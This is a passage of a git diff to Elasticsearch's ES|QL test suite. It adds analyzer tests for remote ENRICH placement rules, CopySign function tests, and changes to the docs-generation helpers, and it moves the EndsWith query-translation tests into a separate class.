java.util.Set; +import static org.elasticsearch.xpack.core.enrich.EnrichPolicy.MATCH_TYPE; +import static org.elasticsearch.xpack.esql.EsqlTestUtils.TEST_CFG; +import static org.elasticsearch.xpack.esql.EsqlTestUtils.TEST_VERIFIER; import static org.elasticsearch.xpack.esql.EsqlTestUtils.paramAsConstant; import static org.elasticsearch.xpack.esql.EsqlTestUtils.withDefaultLimitWarning; +import static org.elasticsearch.xpack.esql.analysis.AnalyzerTestUtils.defaultLookupResolution; +import static org.elasticsearch.xpack.esql.analysis.AnalyzerTestUtils.loadEnrichPolicyResolution; import static org.elasticsearch.xpack.esql.analysis.AnalyzerTestUtils.loadMapping; import static org.elasticsearch.xpack.esql.core.type.DataType.BOOLEAN; import static org.elasticsearch.xpack.esql.core.type.DataType.CARTESIAN_POINT; @@ -359,7 +365,7 @@ public void testAggsExpressionsInStatsAggs() { error("from test | stats max(max(salary)) by first_name") ); assertEquals( - "1:25: argument of [avg(first_name)] must be [numeric except unsigned_long or counter types]," + "1:25: argument of [avg(first_name)] must be [aggregate_metric_double or numeric except unsigned_long or counter types]," + " found value [first_name] type [keyword]", error("from test | stats count(avg(first_name)) by first_name") ); @@ -2219,6 +2225,148 @@ public void testFullTextFunctionsInStats() { } } + public void testRemoteEnrichAfterLookupJoin() { + EnrichResolution enrichResolution = new EnrichResolution(); + loadEnrichPolicyResolution( + enrichResolution, + Enrich.Mode.REMOTE, + MATCH_TYPE, + "languages", + "language_code", + "languages_idx", + "mapping-languages.json" + ); + var analyzer = AnalyzerTestUtils.analyzer( + loadMapping("mapping-default.json", "test"), + defaultLookupResolution(), + 
enrichResolution, + TEST_VERIFIER + ); + + String lookupCommand = randomBoolean() ? "LOOKUP JOIN test_lookup ON languages" : "LOOKUP JOIN languages_lookup ON language_code"; + + query(Strings.format(""" + FROM test + | EVAL language_code = languages + | ENRICH _remote:languages ON language_code + | %s + """, lookupCommand), analyzer); + + String err = error(Strings.format(""" + FROM test + | EVAL language_code = languages + | %s + | ENRICH _remote:languages ON language_code + """, lookupCommand), analyzer); + assertThat(err, containsString("4:3: ENRICH with remote policy can't be executed after LOOKUP JOIN")); + + err = error(Strings.format(""" + FROM test + | EVAL language_code = languages + | %s + | ENRICH _remote:languages ON language_code + | %s + """, lookupCommand, lookupCommand), analyzer); + assertThat(err, containsString("4:3: ENRICH with remote policy can't be executed after LOOKUP JOIN")); + + err = error(Strings.format(""" + FROM test + | EVAL language_code = languages + | %s + | EVAL x = 1 + | MV_EXPAND language_code + | ENRICH _remote:languages ON language_code + """, lookupCommand), analyzer); + assertThat(err, containsString("6:3: ENRICH with remote policy can't be executed after LOOKUP JOIN")); + } + + public void testRemoteEnrichAfterCoordinatorOnlyPlans() { + EnrichResolution enrichResolution = new EnrichResolution(); + loadEnrichPolicyResolution( + enrichResolution, + Enrich.Mode.REMOTE, + MATCH_TYPE, + "languages", + "language_code", + "languages_idx", + "mapping-languages.json" + ); + loadEnrichPolicyResolution( + enrichResolution, + Enrich.Mode.COORDINATOR, + MATCH_TYPE, + "languages", + "language_code", + "languages_idx", + "mapping-languages.json" + ); + var analyzer = AnalyzerTestUtils.analyzer( + loadMapping("mapping-default.json", "test"), + defaultLookupResolution(), + enrichResolution, + TEST_VERIFIER + ); + + query(""" + FROM test + | EVAL language_code = languages + | ENRICH _remote:languages ON language_code + | STATS count(*) BY language_name + """, analyzer); + + String err = error(""" + FROM test + | EVAL language_code = languages + | STATS count(*) BY language_code + | ENRICH _remote:languages ON language_code + """, analyzer); + assertThat(err, containsString("4:3: ENRICH with remote policy can't be executed after STATS")); + + err = error(""" + FROM test + | EVAL language_code = languages + | STATS count(*) BY language_code + | EVAL x = 1 + | MV_EXPAND language_code + | ENRICH _remote:languages ON language_code + """, analyzer); + assertThat(err, containsString("6:3: ENRICH with remote policy can't be executed after STATS")); + + query(""" + FROM test + | EVAL language_code = languages + | ENRICH _remote:languages ON language_code + | ENRICH _coordinator:languages ON language_code + """, analyzer); + + err = error(""" + FROM test + | EVAL language_code = languages + | ENRICH _coordinator:languages ON language_code + | ENRICH _remote:languages ON language_code + """, analyzer); + assertThat(err, containsString("4:3: ENRICH with remote policy can't be executed after another ENRICH with coordinator policy")); + + err = error(""" + FROM test + | EVAL language_code = languages + | ENRICH _coordinator:languages ON language_code + | EVAL x = 1 + | MV_EXPAND language_name + | DISSECT language_name "%{foo}" + | ENRICH _remote:languages ON language_code + """, analyzer); + assertThat(err, containsString("7:3: ENRICH with remote policy can't be executed after another ENRICH with coordinator policy")); + + err = error(""" + FROM test + | FORK (WHERE languages == 
1) (WHERE languages == 2) + | EVAL language_code = languages + | ENRICH _remote:languages ON language_code + """, analyzer); + assertThat(err, containsString("4:3: ENRICH with remote policy can't be executed after FORK")); + } + private void checkFullTextFunctionsInStats(String functionInvocation) { query("from test | stats c = max(id) where " + functionInvocation, fullTextAnalyzer); query("from test | stats c = max(id) where " + functionInvocation + " or length(title) > 10", fullTextAnalyzer); @@ -2239,7 +2387,7 @@ private void query(String query) { } private void query(String query, Analyzer analyzer) { - analyzer.analyze(parser.createStatement(query)); + analyzer.analyze(parser.createStatement(query, TEST_CFG)); } private String error(String query) { @@ -2270,7 +2418,7 @@ private String error(String query, Analyzer analyzer, Class Throwable e = expectThrows( exception, "Expected error for query [" + query + "] but no error was raised", - () -> analyzer.analyze(parser.createStatement(query, new QueryParams(parameters))) + () -> analyzer.analyze(parser.createStatement(query, new QueryParams(parameters), TEST_CFG)) ); assertThat(e, instanceOf(exception)); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/CheckLicenseTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/CheckLicenseTests.java index 68a6f38cdd69a..039b34252c12e 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/CheckLicenseTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/CheckLicenseTests.java @@ -79,7 +79,7 @@ public EsqlFunctionRegistry snapshotRegistry() { } }; - var plan = parser.createStatement(esql); + var plan = parser.createStatement(esql, EsqlTestUtils.TEST_CFG); plan = plan.transformDown( Limit.class, l -> Objects.equals(l.limit().fold(FoldContext.small()), 10) diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DeepCopy.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DeepCopy.java index 593a444eceec2..d1d5361880218 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DeepCopy.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DeepCopy.java @@ -52,6 +52,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() { Releasables.closeExpectNoException(child); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DocsV3Support.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DocsV3Support.java index 7bcb194c62a75..e60eeb63785d5 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DocsV3Support.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/DocsV3Support.java @@ -60,7 +60,9 @@ import java.util.List; import java.util.Locale; import java.util.Map; +import java.util.Objects; import java.util.Optional; +import java.util.TreeMap; import java.util.function.Function; import java.util.function.Supplier; import java.util.regex.Matcher; @@ -308,7 +310,7 @@ public License.OperationMode invoke(List fieldTypes) throws Exception protected final String name; protected final FunctionDefinition definition; protected final Logger logger; - private final 
Supplier, DataType>> signatures; + protected final Supplier, DataType>> signatures; private TempFileWriter tempFileWriter; private final LicenseRequirementChecker licenseChecker; @@ -836,14 +838,30 @@ void renderDetailedDescription(String detailedDescription, String note) throws I /** Command specific docs generating, currently very empty since we only render kibana definition files */ public static class CommandsDocsSupport extends DocsV3Support { private final LogicalPlan command; + private List args; private final XPackLicenseState licenseState; + /** Used in CommandLicenseTests to generate Kibana docs with licensing information for commands */ public CommandsDocsSupport(String name, Class testClass, LogicalPlan command, XPackLicenseState licenseState) { super("commands", name, testClass, Map::of); this.command = command; this.licenseState = licenseState; } + /** Used in LookupJoinTypesIT to generate table of supported types for join field */ + public CommandsDocsSupport( + String name, + Class testClass, + LogicalPlan command, + List args, + Supplier, DataType>> signatures + ) { + super("commands", name, testClass, signatures); + this.command = command; + this.args = args; + this.licenseState = null; + } + @Override public void renderSignature() throws IOException { // Unimplemented until we make command docs dynamically generated @@ -851,8 +869,14 @@ public void renderSignature() throws IOException { @Override public void renderDocs() throws Exception { - // Currently we only render kibana definition files, but we could expand to rendering much more if we decide to - renderKibanaCommandDefinition(); + // Currently we only render either signatures or kibana definition files, + // but we could expand to rendering much more if we decide to + if (args != null) { + renderTypes(name, args); + } + if (licenseState != null) { + renderKibanaCommandDefinition(); + } } void renderKibanaCommandDefinition() throws Exception { @@ -872,6 +896,47 @@ void renderKibanaCommandDefinition() throws Exception { writeToTempKibanaDir("definition", "json", rendered); } } + + @Override + void renderTypes(String name, List args) throws IOException { + assert args.size() == 2; + StringBuilder header = new StringBuilder("| "); + StringBuilder separator = new StringBuilder("| "); + List argNames = args.stream().map(EsqlFunctionRegistry.ArgSignature::name).toList(); + for (String arg : argNames) { + header.append(arg).append(" | "); + separator.append("---").append(" | "); + } + + Map> compactedTable = new TreeMap<>(); + for (Map.Entry, DataType> sig : this.signatures.get().entrySet()) { + if (shouldHideSignature(sig.getKey(), sig.getValue())) { + continue; + } + String mainType = sig.getKey().getFirst().esNameIfPossible(); + String secondaryType = sig.getKey().get(1).esNameIfPossible(); + List secondaryTypes = compactedTable.computeIfAbsent(mainType, (k) -> new ArrayList<>()); + secondaryTypes.add(secondaryType); + } + + List table = new ArrayList<>(); + for (Map.Entry> sig : compactedTable.entrySet()) { + String row = "| " + sig.getKey() + " | " + String.join(", ", sig.getValue()) + " |"; + table.add(row); + } + Collections.sort(table); + if (table.isEmpty()) { + logger.info("Warning: No table of types generated for [{}]", name); + return; + } + + String rendered = DOCS_WARNING + """ + **Supported types** + + """ + header + "\n" + separator + "\n" + String.join("\n", table) + "\n\n"; + logger.info("Writing function types for [{}]:\n{}", name, rendered); + writeToTempSnippetsDir("types", rendered); + } } protected 
String buildFunctionSignatureSvg() throws IOException { @@ -893,6 +958,7 @@ void renderParametersList(List argNames, List argDescriptions) t } void renderTypes(String name, List args) throws IOException { + boolean showResultColumn = signatures.get().values().stream().anyMatch(Objects::nonNull); StringBuilder header = new StringBuilder("| "); StringBuilder separator = new StringBuilder("| "); List argNames = args.stream().map(EsqlFunctionRegistry.ArgSignature::name).toList(); @@ -900,8 +966,10 @@ void renderTypes(String name, List args) thro header.append(arg).append(" | "); separator.append("---").append(" | "); } - header.append("result |"); - separator.append("--- |"); + if (showResultColumn) { + header.append("result |"); + separator.append("--- |"); + } List table = new ArrayList<>(); for (Map.Entry, DataType> sig : this.signatures.get().entrySet()) { // TODO flip to using sortedSignatures @@ -911,7 +979,7 @@ void renderTypes(String name, List args) thro if (sig.getKey().size() > argNames.size()) { // skip variadic [test] cases (but not those with optional parameters) continue; } - table.add(getTypeRow(args, sig, argNames)); + table.add(getTypeRow(args, sig, argNames, showResultColumn)); } Collections.sort(table); if (table.isEmpty()) { @@ -930,7 +998,8 @@ void renderTypes(String name, List args) thro private static String getTypeRow( List args, Map.Entry, DataType> sig, - List argNames + List argNames, + boolean showResultColumn ) { StringBuilder b = new StringBuilder("| "); for (int i = 0; i < sig.getKey().size(); i++) { @@ -944,8 +1013,10 @@ private static String getTypeRow( b.append(" | "); } b.append("| ".repeat(argNames.size() - sig.getKey().size())); - b.append(sig.getValue().esNameIfPossible()); - b.append(" |"); + if (showResultColumn) { + b.append(sig.getValue().esNameIfPossible()); + b.append(" |"); + } return b.toString(); } @@ -1021,19 +1092,21 @@ void renderKibanaInlineDocs(String name, String titleName, FunctionInfo info) th builder.append("### ").append(titleName.toUpperCase(Locale.ROOT)).append("\n"); String cleanedDesc = replaceLinks(info.description()); cleanedDesc = removeAppliesToBlocks(cleanedDesc); - builder.append(cleanedDesc).append("\n\n"); + builder.append(cleanedDesc).append("\n"); + + if (Strings.isNullOrEmpty(info.note()) == false) { + String cleanedNote = replaceLinks(info.note()); + cleanedNote = removeAppliesToBlocks(cleanedNote); + builder.append("\nNote: ").append(cleanedNote).append("\n"); + } if (info.examples().length > 0) { Example example = info.examples()[0]; - builder.append("```esql\n"); + builder.append("\n```esql\n"); builder.append(loadExample(example.file(), example.tag())); builder.append("\n```\n"); } - if (Strings.isNullOrEmpty(info.note()) == false) { - String cleanedNote = replaceLinks(info.note()); - cleanedNote = removeAppliesToBlocks(cleanedNote); - builder.append("Note: ").append(cleanedNote).append("\n"); - } + String rendered = builder.toString(); logger.info("Writing kibana inline docs for [{}]:\n{}", name, rendered); writeToTempKibanaDir("docs", "md", rendered); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistryTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistryTests.java index d8c1b40e78c48..2082db4592efb 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistryTests.java +++ 
b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/EsqlFunctionRegistryTests.java @@ -159,6 +159,9 @@ public void testConfigurationOptionalFunction() { ); def = r.resolveFunction(r.resolveAlias("DUMMY")); assertEquals(ur.source(), ur.buildResolved(randomConfiguration(), def).source()); + + ParsingException e = expectThrows(ParsingException.class, () -> uf(DEFAULT).buildResolved(randomConfiguration(), def)); + assertThat(e.getMessage(), containsString("expects exactly one argument")); } private static UnresolvedFunction uf(FunctionResolutionStrategy resolutionStrategy, Expression... children) { diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/TestCaseSupplier.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/TestCaseSupplier.java index 584f5f013563e..b2311044967bf 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/TestCaseSupplier.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/TestCaseSupplier.java @@ -47,6 +47,7 @@ import java.util.function.UnaryOperator; import java.util.stream.Collectors; +import static org.elasticsearch.xpack.esql.core.util.NumericUtils.UNSIGNED_LONG_MAX; import static org.elasticsearch.xpack.esql.core.util.SpatialCoordinateTypes.CARTESIAN; import static org.elasticsearch.xpack.esql.core.util.SpatialCoordinateTypes.GEO; import static org.hamcrest.Matchers.equalTo; @@ -357,6 +358,26 @@ public static List getSuppliersForNumericType(DataType type, throw new IllegalArgumentException("bogus numeric type [" + type + "]"); } + /** + * A {@link List} of the cases for the specified type without any limits. + * See {@link #getSuppliersForNumericType} for cases with limits on numbers. 
+ */ + public static List unlimitedSuppliers(DataType type) { + if (type == DataType.INTEGER) { + return intCases(Integer.MIN_VALUE, Integer.MAX_VALUE, true); + } + if (type == DataType.LONG) { + return longCases(Long.MIN_VALUE, Long.MAX_VALUE, true); + } + if (type == DataType.UNSIGNED_LONG) { + return ulongCases(BigInteger.ZERO, UNSIGNED_LONG_MAX, true); + } + if (type == DataType.DOUBLE) { + return doubleCases(-Double.MAX_VALUE, Double.MAX_VALUE, true); + } + throw new IllegalArgumentException("bogus numeric type [" + type + "]"); + } + public static List forBinaryComparisonWithWidening( NumericTypeTestConfigs typeStuff, String lhsName, diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/AvgErrorTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/AvgErrorTests.java index 16f80e4564cff..69c14f815a236 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/AvgErrorTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/AvgErrorTests.java @@ -32,6 +32,13 @@ protected Expression build(Source source, List args) { @Override protected Matcher expectedTypeErrorMatcher(List> validPerPosition, List signature) { - return equalTo(typeErrorMessage(false, validPerPosition, signature, (v, p) -> "numeric except unsigned_long or counter types")); + return equalTo( + typeErrorMessage( + false, + validPerPosition, + signature, + (v, p) -> "aggregate_metric_double or numeric except unsigned_long or counter types" + ) + ); } } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/StdDevTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/StdDevTests.java index 409bb5bcba6fb..a429abf721739 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/StdDevTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/aggregate/StdDevTests.java @@ -61,7 +61,7 @@ private static TestCaseSupplier makeSupplier(TestCaseSupplier.TypedDataSupplier welfordAlgorithm.add(value); } var result = welfordAlgorithm.evaluate(); - var expected = Double.isInfinite(result) ? null : result; + var expected = Double.isFinite(result) ? 
result : null; return new TestCaseSupplier.TestCase( List.of(fieldTypedData), "StdDev[field=Attribute[channel=0]]", diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/CaseExtraTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/CaseExtraTests.java index fd54408e0e2b8..a7ca2a7a37e19 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/CaseExtraTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/conditional/CaseExtraTests.java @@ -280,6 +280,11 @@ public Block eval(Page page) { return null; } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} }; diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignErrorTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignErrorTests.java new file mode 100644 index 0000000000000..d0792951f98e2 --- /dev/null +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignErrorTests.java @@ -0,0 +1,37 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import org.elasticsearch.xpack.esql.core.expression.Expression; +import org.elasticsearch.xpack.esql.core.tree.Source; +import org.elasticsearch.xpack.esql.core.type.DataType; +import org.elasticsearch.xpack.esql.expression.function.ErrorsForCasesWithoutExamplesTestCase; +import org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier; +import org.hamcrest.Matcher; + +import java.util.List; +import java.util.Set; + +import static org.hamcrest.Matchers.equalTo; + +public class CopySignErrorTests extends ErrorsForCasesWithoutExamplesTestCase { + @Override + protected List cases() { + return paramsToSuppliers(CopySignTests.parameters()); + } + + @Override + protected Expression build(Source source, List args) { + return new CopySign(source, args.get(0), args.get(1)); + } + + @Override + protected Matcher expectedTypeErrorMatcher(List> validPerPosition, List signature) { + return equalTo(typeErrorMessage(true, validPerPosition, signature, (v, i) -> "numeric")); + } +} diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignTests.java new file mode 100644 index 0000000000000..5a7dd395eca99 --- /dev/null +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/math/CopySignTests.java @@ -0,0 +1,106 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. 
+ */ + +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import com.carrotsearch.randomizedtesting.annotations.Name; +import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; + +import org.elasticsearch.xpack.esql.core.expression.Expression; +import org.elasticsearch.xpack.esql.core.tree.Source; +import org.elasticsearch.xpack.esql.core.type.DataType; +import org.elasticsearch.xpack.esql.expression.function.AbstractScalarFunctionTestCase; +import org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier; +import org.hamcrest.Matcher; +import org.hamcrest.Matchers; + +import java.util.ArrayList; +import java.util.List; +import java.util.function.BiFunction; +import java.util.function.BinaryOperator; +import java.util.function.Supplier; + +import static org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier.casesCrossProduct; +import static org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier.getCastEvaluator; +import static org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier.unlimitedSuppliers; +import static org.hamcrest.Matchers.equalTo; + +public class CopySignTests extends AbstractScalarFunctionTestCase { + public CopySignTests(@Name("TestCase") Supplier testCaseSupplier) { + this.testCase = testCaseSupplier.get(); + } + + @ParametersFactory + public static Iterable parameters() { + List suppliers = new ArrayList<>(); + List numericTypes = List.of(DataType.INTEGER, DataType.LONG, DataType.DOUBLE); + + for (DataType lhsType : numericTypes) { + for (DataType rhsType : numericTypes) { + BinaryOperator expected = (lhs, rhs) -> { + double sign = ((Number) rhs).doubleValue(); + return switch (lhs) { + case Integer v -> { + if (sign < 0) { + yield v > 0 ? -v : v; + } + yield v > 0 ? v : -v; + } + case Long v -> { + if (sign < 0) { + yield v > 0 ? -v : v; + } + yield v > 0 ? v : -v; + } + case Double v -> Math.copySign(v, sign); + case Float v -> Math.copySign(v, sign); + default -> throw new IllegalArgumentException("unsupported [" + lhs.getClass() + "]"); + }; + }; + BiFunction> evaluatorToString = (lhs, rhs) -> { + String name = "CopySign" + switch (lhs) { + case INTEGER -> "Integer"; + case LONG -> "Long"; + case DOUBLE -> "Double"; + case FLOAT -> "Float"; + default -> throw new IllegalStateException("unsupported [" + lhs + "]"); + } + "Evaluator"; + return equalTo( + name + + "[magnitude=Attribute[channel=0], sign=" + + getCastEvaluator("Attribute[channel=1]", rhs, DataType.DOUBLE) + + "]" + ); + }; + casesCrossProduct( + expected, + unlimitedSuppliers(lhsType), + unlimitedSuppliers(rhsType), + evaluatorToString, + (l, r) -> List.of(), + suppliers, + lhsType, + false + ); + } + } + + return parameterSuppliersFromTypedData( + anyNullIsNull(randomizeBytesRefsOffset(suppliers), (nullPosition, nullValueDataType, original) -> { + if (nullPosition == 0 && nullValueDataType == DataType.NULL) { + return DataType.NULL; + } + return original.expectedType(); + }, (nullPosition, nullData, original) -> nullData.isForceLiteral() ? 
Matchers.equalTo("LiteralsEvaluator[lit=null]") : original) + ); + } + + @Override + protected Expression build(Source source, List args) { + return new CopySign(source, args.get(0), args.get(1)); + } +} diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceTests.java index 1235a175294af..0e2d752433c71 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/nulls/CoalesceTests.java @@ -221,6 +221,11 @@ public Block eval(Page page) { throw new AssertionError("shouldn't be called"); } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} }; diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithStaticTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithStaticTests.java new file mode 100644 index 0000000000000..ddde306deed7a --- /dev/null +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithStaticTests.java @@ -0,0 +1,56 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.expression.function.scalar.string; + +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xpack.esql.capabilities.TranslationAware; +import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; +import org.elasticsearch.xpack.esql.core.expression.Literal; +import org.elasticsearch.xpack.esql.core.querydsl.query.Query; +import org.elasticsearch.xpack.esql.core.querydsl.query.WildcardQuery; +import org.elasticsearch.xpack.esql.core.tree.Source; +import org.elasticsearch.xpack.esql.core.type.DataType; +import org.elasticsearch.xpack.esql.core.type.EsField; +import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; +import org.elasticsearch.xpack.esql.planner.TranslatorHandler; + +import java.util.Map; + +import static org.hamcrest.Matchers.equalTo; + +public class EndsWithStaticTests extends ESTestCase { + public void testLuceneQuery_AllLiterals_NonTranslatable() { + EndsWith function = new EndsWith(Source.EMPTY, Literal.keyword(Source.EMPTY, "test"), Literal.keyword(Source.EMPTY, "test")); + + ESTestCase.assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); + } + + public void testLuceneQuery_NonFoldableSuffix_NonTranslatable() { + EndsWith function = new EndsWith( + Source.EMPTY, + new FieldAttribute(Source.EMPTY, "field", new EsField("field", DataType.KEYWORD, Map.of(), true)), + new FieldAttribute(Source.EMPTY, "field", new EsField("suffix", DataType.KEYWORD, Map.of(), true)) + ); + + assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); + } + + public void testLuceneQuery_NonFoldableSuffix_Translatable() { + EndsWith function = new EndsWith( + Source.EMPTY, + new FieldAttribute(Source.EMPTY, "field", new EsField("suffix", DataType.KEYWORD, 
Map.of(), true)), + Literal.keyword(Source.EMPTY, "a*b?c\\") + ); + + assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.YES)); + + Query query = function.asQuery(LucenePushdownPredicates.DEFAULT, TranslatorHandler.TRANSLATOR_HANDLER); + + assertThat(query, equalTo(new WildcardQuery(Source.EMPTY, "field", "*a\\*b\\?c\\\\", false, false))); + } +} diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithTests.java index d6a6106f9372e..c41b1e14257ee 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/EndsWithTests.java @@ -11,23 +11,15 @@ import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; import org.apache.lucene.util.BytesRef; -import org.elasticsearch.xpack.esql.capabilities.TranslationAware; import org.elasticsearch.xpack.esql.core.expression.Expression; -import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; -import org.elasticsearch.xpack.esql.core.expression.Literal; -import org.elasticsearch.xpack.esql.core.querydsl.query.WildcardQuery; import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; -import org.elasticsearch.xpack.esql.core.type.EsField; import org.elasticsearch.xpack.esql.expression.function.AbstractScalarFunctionTestCase; import org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier; -import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; -import org.elasticsearch.xpack.esql.planner.TranslatorHandler; import org.hamcrest.Matcher; import java.util.LinkedList; import java.util.List; -import java.util.Map; import java.util.function.Supplier; import static org.hamcrest.Matchers.equalTo; @@ -106,34 +98,4 @@ private static TestCaseSupplier.TestCase testCase( protected Expression build(Source source, List args) { return new EndsWith(source, args.get(0), args.get(1)); } - - public void testLuceneQuery_AllLiterals_NonTranslatable() { - var function = new EndsWith(Source.EMPTY, Literal.keyword(Source.EMPTY, "test"), Literal.keyword(Source.EMPTY, "test")); - - assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); - } - - public void testLuceneQuery_NonFoldableSuffix_NonTranslatable() { - var function = new EndsWith( - Source.EMPTY, - new FieldAttribute(Source.EMPTY, "field", new EsField("field", DataType.KEYWORD, Map.of(), true)), - new FieldAttribute(Source.EMPTY, "field", new EsField("suffix", DataType.KEYWORD, Map.of(), true)) - ); - - assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); - } - - public void testLuceneQuery_NonFoldableSuffix_Translatable() { - var function = new EndsWith( - Source.EMPTY, - new FieldAttribute(Source.EMPTY, "field", new EsField("suffix", DataType.KEYWORD, Map.of(), true)), - Literal.keyword(Source.EMPTY, "a*b?c\\") - ); - - assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.YES)); - - var query = function.asQuery(LucenePushdownPredicates.DEFAULT, TranslatorHandler.TRANSLATOR_HANDLER); - - assertThat(query, equalTo(new WildcardQuery(Source.EMPTY, 
